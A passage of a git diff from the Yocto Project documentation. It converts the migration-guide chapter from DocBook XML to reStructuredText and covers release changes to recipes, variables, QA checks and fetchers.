+ wish to disable this check, remove ``src-uri-bad`` from
+ :term:`WARN_QA`.
+
+- The ``file-rdeps`` runtime dependency check no longer expands
+ :term:`RDEPENDS` recursively as there is no mechanism
+ to ensure they can be fully computed, and thus races sometimes result
+ in errors either showing up or not. Thus, you might now see errors
+ for missing runtime dependencies that were previously satisfied
+ recursively. Here is an example: package A contains a shell script
+ starting with ``#!/bin/bash`` but has no dependency on bash. However,
+ package A depends on package B, which does depend on bash. You need
+ to add the missing dependency or dependencies to resolve the warning.
+
+- Setting ``DEPENDS_${PN}`` anywhere (i.e. typically in a recipe) now
+ triggers an error. The error is triggered because
+ :term:`DEPENDS` is not a package-specific variable
+ unlike RDEPENDS. You should set ``DEPENDS`` instead.
+
+- systemd currently does not work well with the musl C library because
+ only upstream officially supports linking the library with glibc.
+ Thus, a warning is shown when building systemd in conjunction with
+ musl.
+
+.. _migration-3.0-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following miscellaneous changes have occurred.
+
+- The ``gnome`` class has been removed because it now does very little.
+ You should update recipes that previously inherited this class to do
+ the following: inherit gnomebase gtk-icon-cache gconf mime
+
+- The ``meta/recipes-kernel/linux/linux-dtb.inc`` file has been
+ removed. This file was previously deprecated in favor of setting
+ :term:`KERNEL_DEVICETREE` in any kernel
+ recipe and only produced a warning. Remove any ``include`` or
+ ``require`` statements pointing to this file.
+
+- :term:`TARGET_CFLAGS`,
+ :term:`TARGET_CPPFLAGS`,
+ :term:`TARGET_CXXFLAGS`, and
+ :term:`TARGET_LDFLAGS` are no longer exported
+ to the external environment. This change did not require any changes
+ to core recipes, which is a good indicator that no changes will be
+ required. However, if for some reason the software being built by one
+ of your recipes is expecting these variables to be set, then building
+ the recipe will fail. In such cases, you must either export the
+ variable or variables in the recipe or change the scripts so that
+ exporting is not necessary.
+
+- You must change the host distro identifier used in
+ :term:`NATIVELSBSTRING` to use all lowercase
+ characters even if it does not contain a version number. This change
+ is necessary only if you are not using ``uninative`` and
+ :term:`SANITY_TESTED_DISTROS`.
+
+- In the ``base-files`` recipe, writing the hostname into
+ ``/etc/hosts`` and ``/etc/hostname`` is now done within the main
+ :ref:`ref-tasks-install` function rather than in the
+ ``do_install_basefilesissue`` function. The reason for the change is
+ because ``do_install_basefilesissue`` is more easily overridden
+ without having to duplicate the hostname functionality. If you have
+ done the latter (e.g. in a ``base-files`` bbappend), then you should
+ remove it from your customized ``do_install_basefilesissue``
+ function.
+
+- The ``wic --expand`` command now uses commas to separate "key:value"
+ pairs rather than hyphens.
+
+ .. note::
+
+ The wic command-line help is not updated.
+
+ You must update any scripts or commands where you use
+ ``wic --expand`` with multiple "key:value" pairs.
+
+- UEFI image variable settings have been moved from various places to a
+ central ``conf/image-uefi.conf``. This change should not influence
+ any existing configuration as the ``meta/conf/image-uefi.conf`` in
+ the core metadata sets defaults that can be overridden in the same
+ manner as before.
+
+- ``conf/distro/include/world-broken.inc`` has been removed. For cases
+ where certain recipes need to be disabled when using the musl C
+ library, these recipes now have ``COMPATIBLE_HOST_libc-musl`` set
+ with a comment that explains why.
+
+
diff --git a/documentation/ref-manual/migration-3.1.rst b/documentation/ref-manual/migration-3.1.rst
new file mode 100644
index 0000000000..4fcd2490d3
--- /dev/null
+++ b/documentation/ref-manual/migration-3.1.rst
@@ -0,0 +1,276 @@
+Moving to the Yocto Project 3.1 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 3.1 Release from the prior release.
+
+.. _migration-3.1-minimum-system-requirements:
+
+Minimum system requirements
+---------------------------
+
+The following versions / requirements of build host components have been
+updated:
+
+- gcc 5.0
+
+- python 3.5
+
+- tar 1.28
+
+- ``rpcgen`` is now required on the host (part of the ``libc-dev-bin``
+ package on Ubuntu, Debian and related distributions, and the
+ ``glibc`` package on RPM-based distributions).
+
+Additionally, the ``makeinfo`` and ``pod2man`` tools are *no longer*
+required on the host.
+
+.. _migration-3.1-mpc8315e-rdb-removed:
+
+mpc8315e-rdb machine removed
+----------------------------
+
+The MPC8315E-RDB machine is old/obsolete and unobtainable, thus given
+the maintenance burden the ``mpc8315e-rdb`` machine configuration that
+supported it has been removed in this release. The removal does leave a
+gap in official PowerPC reference hardware support; this may change in
+future if a suitable machine with accompanying support resources is
+found.
+
+.. _migration-3.1-python-2-removed:
+
+Python 2 removed
+----------------
+
+Due to the expiration of upstream support in January 2020, support for
+Python 2 has now been removed; it is recommended that you use Python 3
+instead. If absolutely needed there is a meta-python2 community layer
+containing Python 2, related classes and various Python 2-based modules,
+however it should not be considered as supported.
+
+.. _migration-3.1-reproducible-builds:
+
+Reproducible builds now enabled by default
+------------------------------------------
+
+In order to avoid unnecessary differences in output files (aiding binary
+reproducibility), the Poky distribution configuration
+(``DISTRO = "poky"``) now inherits the ``reproducible_build`` class by
+default.
+
+.. _migration-3.1-ptest-feature-impact:
+
+Impact of ptest feature is now more significant
+-----------------------------------------------
+
+The Poky distribution configuration (``DISTRO = "poky"``) enables ptests
+by default to enable runtime testing of various components. In this
+release, a dependency needed to be added that has resulted in a
+significant increase in the number of components that will be built just
+when building a simple image such as core-image-minimal. If you do not
+need runtime tests enabled for core components, then it is recommended
+that you remove "ptest" from
+:term:`DISTRO_FEATURES` to save a significant
+amount of build time e.g. by adding the following in your configuration:
+::
+
+ DISTRO_FEATURES_remove = "ptest"
+
+.. _migration-3.1-removed-recipes:
+
+Removed recipes
+---------------
+
+The following recipes have been removed:
+
+- ``chkconfig``: obsolete
+
+- ``console-tools``: obsolete
+
+- ``enchant``: replaced by ``enchant2``
+
+- ``foomatic-filters``: obsolete
+
+- ``libidn``: no longer needed, moved to meta-oe
+
+- ``libmodulemd``: replaced by ``libmodulemd-v1``
+
+- ``linux-yocto``: drop 4.19, 5.2 version recipes (5.4 now provided)
+
+- ``nspr``: no longer needed, moved to meta-oe
+
+- ``nss``: no longer needed, moved to meta-oe
+
+- ``python``: Python 2 removed (Python 3 preferred)
+
+- ``python-setuptools``: Python 2 version removed (python3-setuptools
+ preferred)
+
+- ``sysprof``: no longer needed, moved to meta-oe
+
+- ``texi2html``: obsolete
+
+- ``u-boot-fw-utils``: functionally replaced by ``libubootenv``
+
+.. _migration-3.1-features-check:
+
+features_check class replaces distro_features_check
+---------------------------------------------------
+
+The ``distro_features_check`` class has had its functionality expanded,
+now supporting ``ANY_OF_MACHINE_FEATURES``,
+``REQUIRED_MACHINE_FEATURES``, ``CONFLICT_MACHINE_FEATURES``,
+``ANY_OF_COMBINED_FEATURES``, ``REQUIRED_COMBINED_FEATURES``,
+``CONFLICT_COMBINED_FEATURES``. As a result the class has now been
+renamed to ``features_check``; the ``distro_features_check`` class still
+exists but generates a warning and redirects to the new class. In
+preparation for a future removal of the old class it is recommended that
+you update recipes currently inheriting ``distro_features_check`` to
+inherit ``features_check`` instead.
+
+.. _migration-3.1-removed-classes:
+
+Removed classes
+---------------
+
+The following classes have been removed:
+
+- ``distutils-base``: moved to meta-python2
+
+- ``distutils``: moved to meta-python2
+
+- ``libc-common``: merged into the glibc recipe as nothing else used
+ it.
+
+- ``python-dir``: moved to meta-python2
+
+- ``pythonnative``: moved to meta-python2
+
+- ``setuptools``: moved to meta-python2
+
+- ``tinderclient``: dropped as it was obsolete.
+
+.. _migration-3.1-src-uri-checksums:
+
+SRC_URI checksum behaviour
+--------------------------
+
+Previously, recipes by tradition included both SHA256 and MD5 checksums
+for remotely fetched files in :term:`SRC_URI`, even
+though only one is actually mandated. However, the MD5 checksum does not
+add much given its inherent weakness; thus when a checksum fails only
+the SHA256 sum will now be printed. The md5sum will still be verified if
+it is specified.
+
+.. _migration-3.1-npm:
+
+npm fetcher changes
+-------------------
+
+The npm fetcher has been completely reworked in this release. The npm
+fetcher now only fetches the package source itself and no longer the
+dependencies; there is now also an npmsw fetcher which explicitly
+fetches the shrinkwrap file and the dependencies. This removes the
+slightly awkward ``NPM_LOCKDOWN`` and ``NPM_SHRINKWRAP`` variables which
+pointed to local files; the lockdown file is no longer needed at all.
+Additionally, the package name in ``npm://`` entries in
+:term:`SRC_URI` is now specified using a ``package``
+parameter instead of the earlier ``name`` which overlapped with the
+generic ``name`` parameter. All recipes using the npm fetcher will need
+to be changed as a result.
+
+An example of the new scheme: ::
+
+ SRC_URI = "npm://registry.npmjs.org;package=array-flatten;version=1.1.1 \
+ npmsw://${THISDIR}/npm-shrinkwrap.json"
+
+Another example where the sources are fetched from git rather than an npm repository: ::
+
+ SRC_URI = "git://github.com/foo/bar.git;protocol=https \
+ npmsw://${THISDIR}/npm-shrinkwrap.json"
+
+devtool and recipetool have also been updated to match with the npm
+fetcher changes. Other than producing working and more complete recipes
+for npm sources, there is also a minor change to the command line for
+devtool: the ``--fetch-dev`` option has been renamed to ``--npm-dev`` as
+it is npm-specific.
+
+.. _migration-3.1-packaging-changes:
+
+Packaging changes
+-----------------
+
+- ``intltool`` has been removed from ``packagegroup-core-sdk`` as it is
+ rarely needed to build modern software - gettext can do most of the
+ things it used to be needed for. ``intltool`` has also been removed
+ from ``packagegroup-core-self-hosted`` as it is not needed to for
+ standard builds.
+
+- git: ``git-am``, ``git-difftool``, ``git-submodule``, and
+ ``git-request-pull`` are no longer perl-based, so are now installed
+ with the main ``git`` package instead of within ``git-perltools``.
+
+- The ``ldconfig`` binary built as part of glibc has now been moved to
+ its own ``ldconfig`` package (note no ``glibc-`` prefix). This
+ package is in the :term:`RRECOMMENDS` of the main
+ ``glibc`` package if ``ldconfig`` is present in
+ :term:`DISTRO_FEATURES`.
+
+- ``libevent`` now splits each shared library into its own package (as
+ Debian does). Since these are shared libraries and will be pulled in
+ through the normal shared library dependency handling, there should
+ be no impact to existing configurations other than less unnecessary
+ libraries being installed in some cases.
+
+- linux-firmware now has a new package for ``bcm4366c`` and includes
+ available NVRAM config files into the ``bcm43340``, ``bcm43362``,
+ ``bcm43430`` and ``bcm4356-pcie`` packages.
+
+- ``harfbuzz`` now splits the new ``libharfbuzz-subset.so`` library
+ into its own package to reduce the main package size in cases where
+ ``libharfbuzz-subset.so`` is not needed.
+
+.. _migration-3.1-package-qa-warnings:
+
+Additional warnings
+-------------------
+
+Warnings will now be shown at ``do_package_qa`` time in the following
+circumstances:
+
+- A recipe installs ``.desktop`` files containing ``MimeType`` keys but
+ does not inherit the new ``mime-xdg`` class
+
+- A recipe installs ``.xml`` files into ``${datadir}/mime/packages``
+ but does not inherit the ``mime`` class
+
+.. _migration-3.1-x86-live-wic:
+
+``wic`` image type now used instead of ``live`` by default for x86
+------------------------------------------------------------------
+
+``conf/machine/include/x86-base.inc`` (inherited by most x86 machine
+configurations) now specifies ``wic`` instead of ``live`` by default in
+:term:`IMAGE_FSTYPES`. The ``live`` image type will
+likely be removed in a future release so it is recommended that you use
+``wic`` instead.
+
+.. _migration-3.1-misc:
+
+Miscellaneous changes
+---------------------
+
+- The undocumented ``SRC_DISTRIBUTE_LICENSES`` variable has now been
+ removed in favour of a new ``AVAILABLE_LICENSES`` variable which is
+ dynamically set based upon license files found in
+ ``${COMMON_LICENSE_DIR}`` and ``${LICENSE_PATH}``.
+
+- The tune definition for big-endian microblaze machines is now
+ ``microblaze`` instead of ``microblazeeb``.
+
+- ``newlib`` no longer has built-in syscalls. ``libgloss`` should then
+ provide the syscalls, ``crt0.o`` and other functions that are no
+ longer part of ``newlib`` itself. If you are using
+ ``TCLIBC = "newlib"`` this now means that you must link applications
+ with both ``newlib`` and ``libgloss``, whereas before ``newlib``
+ would run in many configurations by itself.
diff --git a/documentation/ref-manual/migration-general.rst b/documentation/ref-manual/migration-general.rst
new file mode 100644
index 0000000000..182482ec43
--- /dev/null
+++ b/documentation/ref-manual/migration-general.rst
@@ -0,0 +1,54 @@
+General Migration Considerations
+================================
+
+Some considerations are not tied to a specific Yocto Project release.
+This section presents information you should consider when migrating to
+any new Yocto Project release.
+
+- *Dealing with Customized Recipes*:
+
+ Issues could arise if you take
+ older recipes that contain customizations and simply copy them
+ forward expecting them to work after you migrate to new Yocto Project
+ metadata. For example, suppose you have a recipe in your layer that
+ is a customized version of a core recipe copied from the earlier
+ release, rather than through the use of an append file. When you
+ migrate to a newer version of Yocto Project, the metadata (e.g.
+ perhaps an include file used by the recipe) could have changed in a
+ way that would break the build. Say, for example, a function is
+ removed from an include file and the customized recipe tries to call
+ that function.
+
+ You could "forward-port" all your customizations in your recipe so
+ that everything works for the new release. However, this is not the
+ optimal solution as you would have to repeat this process with each
+ new release if changes occur that give rise to problems.
+
+ The better solution (where practical) is to use append files
+ (``*.bbappend``) to capture any customizations you want to make to a
+ recipe. Doing so, isolates your changes from the main recipe making
+ them much more manageable. However, sometimes it is not practical to
+ use an append file. A good example of this is when introducing a
+ newer or older version of a recipe in another layer.
+
+- *Updating Append Files*:
+
+ Since append files generally only contain
+ your customizations, they often do not need to be adjusted for new
+ releases. However, if the ``.bbappend`` file is specific to a
+ particular version of the recipe (i.e. its name does not use the %
+ wildcard) and the version of the recipe to which it is appending has
+ changed, then you will at a minimum need to rename the append file to
+ match the name of the recipe file. A mismatch between an append file
+ and its corresponding recipe file (``.bb``) will trigger an error
+ during parsing.
+
+ Depending on the type of customization the append file applies, other
+ incompatibilities might occur when you upgrade. For example, if your
+ append file applies a patch and the recipe to which it is appending
+ is updated to a newer version, the patch might no longer apply. If
+ this is the case and assuming the patch is still needed, you must
+ modify the patch file so that it does apply.
+
+
+
diff --git a/documentation/ref-manual/migration.rst b/documentation/ref-manual/migration.rst
new file mode 100644
index 0000000000..20288b0de8
--- /dev/null
+++ b/documentation/ref-manual/migration.rst
@@ -0,0 +1,30 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+******************************************
+Migrating to a Newer Yocto Project Release
+******************************************
+
+This chapter provides information you can use to migrate work to a newer
+Yocto Project release. You can find the same information in the release
+notes for a given release.
+
+.. toctree::
+
+ migration-general
+ migration-1.3
+ migration-1.4
+ migration-1.5
+ migration-1.6
+ migration-1.7
+ migration-1.8
+ migration-2.0
+ migration-2.1
+ migration-2.2
+ migration-2.3
+ migration-2.4
+ migration-2.5
+ migration-2.6
+ migration-2.7
+ migration-3.0
+ migration-3.1
+
diff --git a/documentation/ref-manual/migration.xml b/documentation/ref-manual/migration.xml
deleted file mode 100644
index affc8b90a7..0000000000
--- a/documentation/ref-manual/migration.xml
+++ /dev/null
@@ -1,7300 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='migration'>
-<title>Migrating to a Newer Yocto Project Release</title>
-
- <para>
- This chapter provides information you can use to migrate work to a
- newer Yocto Project release. You can find the same information in the
- release notes for a given release.
- </para>
-
-<section id='general-migration-considerations'>
- <title>General Migration Considerations</title>
-
- <para>
- Some considerations are not tied to a specific Yocto Project
- release.
- This section presents information you should consider when
- migrating to any new Yocto Project release.
- <itemizedlist>
- <listitem><para><emphasis>Dealing with Customized Recipes</emphasis>:
- Issues could arise if you take older recipes that contain
- customizations and simply copy them forward expecting them
- to work after you migrate to new Yocto Project metadata.
- For example, suppose you have a recipe in your layer that is
- a customized version of a core recipe copied from the earlier
- release, rather than through the use of an append file.
- When you migrate to a newer version of Yocto Project, the
- metadata (e.g. perhaps an include file used by the recipe)
- could have changed in a way that would break the build.
- Say, for example, a function is removed from an include file
- and the customized recipe tries to call that function.
- </para>
-
- <para>You could "forward-port" all your customizations in your
- recipe so that everything works for the new release.
- However, this is not the optimal solution as you would have
- to repeat this process with each new release if changes
- occur that give rise to problems.</para>
-
- <para>The better solution (where practical) is to use append
- files (<filename>*.bbappend</filename>) to capture any
- customizations you want to make to a recipe.
- Doing so, isolates your changes from the main recipe making
- them much more manageable.
- However, sometimes it is not practical to use an append
- file.
- A good example of this is when introducing a newer or older
- version of a recipe in another layer.</para>
- </listitem>
- <listitem><para><emphasis>Updating Append Files</emphasis>:
- Since append files generally only contain your customizations,
- they often do not need to be adjusted for new releases.
- However, if the <filename>.bbappend</filename> file is
- specific to a particular version of the recipe (i.e. its
- name does not use the % wildcard) and the version of the
- recipe to which it is appending has changed, then you will
- at a minimum need to rename the append file to match the
- name of the recipe file.
- A mismatch between an append file and its corresponding
- recipe file (<filename>.bb</filename>) will
- trigger an error during parsing.</para>
- <para>Depending on the type of customization the append file
- applies, other incompatibilities might occur when you
- upgrade.
- For example, if your append file applies a patch and the
- recipe to which it is appending is updated to a newer
- version, the patch might no longer apply.
- If this is the case and assuming the patch is still needed,
- you must modify the patch file so that it does apply.
- </para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='moving-to-the-yocto-project-1.3-release'>
- <title>Moving to the Yocto Project 1.3 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 1.3 Release from the prior release.
- </para>
-
- <section id='1.3-local-configuration'>
- <title>Local Configuration</title>
-
- <para>
- Differences include changes for
- <link linkend='var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></link>
- and <filename>bblayers.conf</filename>.
- </para>
-
- <section id='migration-1.3-sstate-mirrors'>
- <title>SSTATE_MIRRORS</title>
-
- <para>
- The shared state cache (sstate-cache), as pointed to by
- <link linkend='var-SSTATE_DIR'><filename>SSTATE_DIR</filename></link>,
- by default now has two-character subdirectories to prevent
- issues arising from too many files in the same directory.
- Also, native sstate-cache packages, which are built to run
- on the host system, will go into a subdirectory named using
- the distro ID string.
- If you copy the newly structured sstate-cache to a mirror
- location (either local or remote) and then point to it in
- <link linkend='var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></link>,
- you need to append "PATH" to the end of the mirror URL so that
- the path used by BitBake before the mirror substitution is
- appended to the path used to access the mirror.
- Here is an example:
- <literallayout class='monospaced'>
- SSTATE_MIRRORS = "file://.* http://<replaceable>someserver</replaceable>.tld/share/sstate/PATH"
- </literallayout>
- </para>
- </section>
-
- <section id='migration-1.3-bblayers-conf'>
- <title>bblayers.conf</title>
-
- <para>
- The <filename>meta-yocto</filename> layer consists of two parts
- that correspond to the Poky reference distribution and the
- reference hardware Board Support Packages (BSPs), respectively:
- <filename>meta-yocto</filename> and
- <filename>meta-yocto-bsp</filename>.
- When running BitBake for the first time after upgrading,
- your <filename>conf/bblayers.conf</filename> file will be
- updated to handle this change and you will be asked to
- re-run or restart for the changes to take effect.
- </para>
- </section>
- </section>
-
- <section id='1.3-recipes'>
- <title>Recipes</title>
-
- <para>
- Differences include changes for the following:
- <itemizedlist>
- <listitem><para>Python function whitespace</para></listitem>
- <listitem><para><filename>proto=</filename> in <filename>SRC_URI</filename></para></listitem>
- <listitem><para><filename>nativesdk</filename></para></listitem>
- <listitem><para>Task recipes</para></listitem>
- <listitem><para><filename>IMAGE_FEATURES</filename></para></listitem>
- <listitem><para>Removed recipes</para></listitem>
- </itemizedlist>
- </para>
-
- <section id='migration-1.3-python-function-whitespace'>
- <title>Python Function Whitespace</title>
-
- <para>
- All Python functions must now use four spaces for indentation.
- Previously, an inconsistent mix of spaces and tabs existed,
- which made extending these functions using
- <filename>_append</filename> or <filename>_prepend</filename>
- complicated given that Python treats whitespace as
- syntactically significant.
- If you are defining or extending any Python functions (e.g.
- <filename>populate_packages</filename>, <filename>do_unpack</filename>,
- <filename>do_patch</filename> and so forth) in custom recipes
- or classes, you need to ensure you are using consistent
- four-space indentation.
- </para>
- </section>
-
- <section id='migration-1.3-proto=-in-src-uri'>
- <title>proto= in SRC_URI</title>
-
- <para>
- Any use of <filename>proto=</filename> in
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
- needs to be changed to <filename>protocol=</filename>.
- In particular, this applies to the following URIs:
- <itemizedlist>
- <listitem><para><filename>svn://</filename></para></listitem>
- <listitem><para><filename>bzr://</filename></para></listitem>
- <listitem><para><filename>hg://</filename></para></listitem>
- <listitem><para><filename>osc://</filename></para></listitem>
- </itemizedlist>
- Other URIs were already using <filename>protocol=</filename>.
- This change improves consistency.
- </para>
- </section>
-
- <section id='migration-1.3-nativesdk'>
- <title>nativesdk</title>
-
- <para>
- The suffix <filename>nativesdk</filename> is now implemented
- as a prefix, which simplifies a lot of the packaging code for
- <filename>nativesdk</filename> recipes.
- All custom <filename>nativesdk</filename> recipes, which are
- relocatable packages that are native to
- <link linkend='var-SDK_ARCH'><filename>SDK_ARCH</filename></link>,
- and any references need to be updated to use
- <filename>nativesdk-*</filename> instead of
- <filename>*-nativesdk</filename>.
- </para>
- </section>
-
- <section id='migration-1.3-task-recipes'>
- <title>Task Recipes</title>
-
- <para>
- "Task" recipes are now known as "Package groups" and have
- been renamed from <filename>task-*.bb</filename> to
- <filename>packagegroup-*.bb</filename>.
- Existing references to the previous <filename>task-*</filename>
- names should work in most cases as there is an automatic
- upgrade path for most packages.
- However, you should update references in your own recipes and
- configurations as they could be removed in future releases.
- You should also rename any custom <filename>task-*</filename>
- recipes to <filename>packagegroup-*</filename>, and change
- them to inherit <filename>packagegroup</filename> instead of
- <filename>task</filename>, as well as taking the opportunity
- to remove anything now handled by
- <filename>packagegroup.bbclass</filename>, such as providing
- <filename>-dev</filename> and <filename>-dbg</filename>
- packages, setting
- <link linkend='var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></link>,
- and so forth.
- See the
- "<link linkend='ref-classes-packagegroup'><filename>packagegroup.bbclass</filename></link>"
- section for further details.
- </para>
- </section>
-
- <section id='migration-1.3-image-features'>
- <title>IMAGE_FEATURES</title>
-
- <para>
- Image recipes that previously included "apps-console-core"
- in <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
- should now include "splash" instead to enable the boot-up
- splash screen.
- Retaining "apps-console-core" will still include the splash
- screen but generates a warning.
- The "apps-x11-core" and "apps-x11-games"
- <filename>IMAGE_FEATURES</filename> features have been removed.
- </para>
- </section>
-
- <section id='migration-1.3-removed-recipes'>
- <title>Removed Recipes</title>
-
- <para>
- The following recipes have been removed.
- For most of them, it is unlikely that you would have any
- references to them in your own
- <link linkend='metadata'>Metadata</link>.
- However, you should check your metadata against this list to be sure:
- <itemizedlist>
- <listitem><para><emphasis><filename>libx11-trim</filename></emphasis>:
- Replaced by <filename>libx11</filename>, which has a negligible
- size difference with modern Xorg.</para></listitem>
- <listitem><para><emphasis><filename>xserver-xorg-lite</filename></emphasis>:
- Use <filename>xserver-xorg</filename>, which has a negligible
- size difference when DRI and GLX modules are not installed.</para></listitem>
- <listitem><para><emphasis><filename>xserver-kdrive</filename></emphasis>:
- Effectively unmaintained for many years.</para></listitem>
- <listitem><para><emphasis><filename>mesa-xlib</filename></emphasis>:
- No longer serves any purpose.</para></listitem>
- <listitem><para><emphasis><filename>galago</filename></emphasis>:
- Replaced by telepathy.</para></listitem>
- <listitem><para><emphasis><filename>gail</filename></emphasis>:
- Functionality was integrated into GTK+ 2.13.</para></listitem>
- <listitem><para><emphasis><filename>eggdbus</filename></emphasis>:
- No longer needed.</para></listitem>
- <listitem><para><emphasis><filename>gcc-*-intermediate</filename></emphasis>:
- The build has been restructured to avoid the need for
- this step.</para></listitem>
- <listitem><para><emphasis><filename>libgsmd</filename></emphasis>:
- Unmaintained for many years.
- Functionality now provided by
- <filename>ofono</filename> instead.</para></listitem>
- <listitem><para><emphasis>contacts, dates, tasks, eds-tools</emphasis>:
- Largely unmaintained PIM application suite.
- It has been moved to <filename>meta-gnome</filename>
- in <filename>meta-openembedded</filename>.</para></listitem>
- </itemizedlist>
- In addition to the previously listed changes, the
- <filename>meta-demoapps</filename> directory has also been removed
- because the recipes in it were not being maintained and many
- had become obsolete or broken.
- Additionally, these recipes were not parsed in the default configuration.
- Many of these recipes are already provided in an updated and
- maintained form within the OpenEmbedded community layers such as
- <filename>meta-oe</filename> and <filename>meta-gnome</filename>.
- For the remainder, you can now find them in the
- <filename>meta-extras</filename> repository, which is in the
- Yocto Project
- <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>.
- </para>
- </section>
- </section>
-
- <section id='1.3-linux-kernel-naming'>
- <title>Linux Kernel Naming</title>
-
- <para>
- The naming scheme for kernel output binaries has been changed to
- now include
- <link linkend='var-PE'><filename>PE</filename></link> as part of the
- filename:
- <literallayout class='monospaced'>
- KERNEL_IMAGE_BASE_NAME ?= "${KERNEL_IMAGETYPE}-${PE}-${PV}-${PR}-${MACHINE}-${DATETIME}"
- </literallayout>
- </para>
-
- <para>
- Because the <filename>PE</filename> variable is not set by default,
- these binary files could result with names that include two dash
- characters.
- Here is an example:
- <literallayout class='monospaced'>
- bzImage--3.10.9+git0+cd502a8814_7144bcc4b8-r0-qemux86-64-20130830085431.bin
- </literallayout>
- </para>
- </section>
-</section>
-
-<section id='moving-to-the-yocto-project-1.4-release'>
- <title>Moving to the Yocto Project 1.4 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 1.4 Release from the prior release.
- </para>
-
- <section id='migration-1.4-bitbake'>
- <title>BitBake</title>
-
- <para>
- Differences include the following:
- <itemizedlist>
- <listitem><para><emphasis>Comment Continuation:</emphasis>
- If a comment ends with a line continuation (\) character,
- then the next line must also be a comment.
- Any instance where this is not the case, now triggers
- a warning.
- You must either remove the continuation character, or be
- sure the next line is a comment.
- </para></listitem>
- <listitem><para><emphasis>Package Name Overrides:</emphasis>
- The runtime package specific variables
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>,
- <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>,
- <link linkend='var-RSUGGESTS'><filename>RSUGGESTS</filename></link>,
- <link linkend='var-RPROVIDES'><filename>RPROVIDES</filename></link>,
- <link linkend='var-RCONFLICTS'><filename>RCONFLICTS</filename></link>,
- <link linkend='var-RREPLACES'><filename>RREPLACES</filename></link>,
- <link linkend='var-FILES'><filename>FILES</filename></link>,
- <link linkend='var-ALLOW_EMPTY'><filename>ALLOW_EMPTY</filename></link>,
- and the pre, post, install, and uninstall script functions
- <filename>pkg_preinst</filename>,
- <filename>pkg_postinst</filename>,
- <filename>pkg_prerm</filename>, and
- <filename>pkg_postrm</filename> should always have a
- package name override.
- For example, use <filename>RDEPENDS_${PN}</filename> for
- the main package instead of <filename>RDEPENDS</filename>.
- BitBake uses more strict checks when it parses recipes.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.4-build-behavior'>
- <title>Build Behavior</title>
-
- <para>
- Differences include the following:
- <itemizedlist>
- <listitem><para><emphasis>Shared State Code:</emphasis>
- The shared state code has been optimized to avoid running
- unnecessary tasks.
- For example, the following no longer populates the target
- sysroot since that is not necessary:
- <literallayout class='monospaced'>
- $ bitbake -c rootfs <replaceable>some-image</replaceable>
- </literallayout>
- Instead, the system just needs to extract the output
- package contents, re-create the packages, and construct
- the root filesystem.
- This change is unlikely to cause any problems unless
- you have missing declared dependencies.
- </para></listitem>
- <listitem><para><emphasis>Scanning Directory Names:</emphasis>
- When scanning for files in
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>,
- the build system now uses
- <link linkend='var-FILESOVERRIDES'><filename>FILESOVERRIDES</filename></link>
- instead of <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>
- for the directory names.
- In general, the values previously in
- <filename>OVERRIDES</filename> are now in
- <filename>FILESOVERRIDES</filename> as well.
- However, if you relied upon an additional value
- you previously added to <filename>OVERRIDES</filename>,
- you might now need to add it to
- <filename>FILESOVERRIDES</filename> unless you are already
- adding it through the
- <link linkend='var-MACHINEOVERRIDES'><filename>MACHINEOVERRIDES</filename></link>
- or <link linkend='var-DISTROOVERRIDES'><filename>DISTROOVERRIDES</filename></link>
- variables, as appropriate.
- For more related changes, see the
- "<link linkend='migration-1.4-variables'>Variables</link>"
- section.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
-
- <section id='migration-1.4-proxies-and-fetching-source'>
- <title>Proxies and Fetching Source</title>
-
- <para>
- A new <filename>oe-git-proxy</filename> script has been added to
- replace previous methods of handling proxies and fetching source
- from Git.
- See the <filename>meta-yocto/conf/site.conf.sample</filename> file
- for information on how to use this script.
- </para>
- </section>
-
- <section id='migration-1.4-custom-interfaces-file-netbase-change'>
- <title>Custom Interfaces File (netbase change)</title>
-
- <para>
- If you have created your own custom
- <filename>etc/network/interfaces</filename> file by creating
- an append file for the <filename>netbase</filename> recipe,
- you now need to create an append file for the
- <filename>init-ifupdown</filename> recipe instead, which you can
- find in the
- <link linkend='source-directory'>Source Directory</link>
- at <filename>meta/recipes-core/init-ifupdown</filename>.
- For information on how to use append files, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#using-bbappend-files'>Using .bbappend Files</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='migration-1.4-remote-debugging'>
- <title>Remote Debugging</title>
-
- <para>
- Support for remote debugging with the Eclipse IDE is now
- separated into an image feature
- (<filename>eclipse-debug</filename>) that corresponds to the
- <filename>packagegroup-core-eclipse-debug</filename> package group.
- Previously, the debugging feature was included through the
- <filename>tools-debug</filename> image feature, which corresponds
- to the <filename>packagegroup-core-tools-debug</filename>
- package group.
- </para>
- </section>
-
- <section id='migration-1.4-variables'>
- <title>Variables</title>
-
- <para>
- The following variables have changed:
- <itemizedlist>
- <listitem><para><emphasis><filename>SANITY_TESTED_DISTROS</filename>:</emphasis>
- This variable now uses a distribution ID, which is composed
- of the host distributor ID followed by the release.
- Previously,
- <link linkend='var-SANITY_TESTED_DISTROS'><filename>SANITY_TESTED_DISTROS</filename></link>
- was composed of the description field.
- For example, "Ubuntu 12.10" becomes "Ubuntu-12.10".
- You do not need to worry about this change if you are not
- specifically setting this variable, or if you are
- specifically setting it to "".
- </para></listitem>
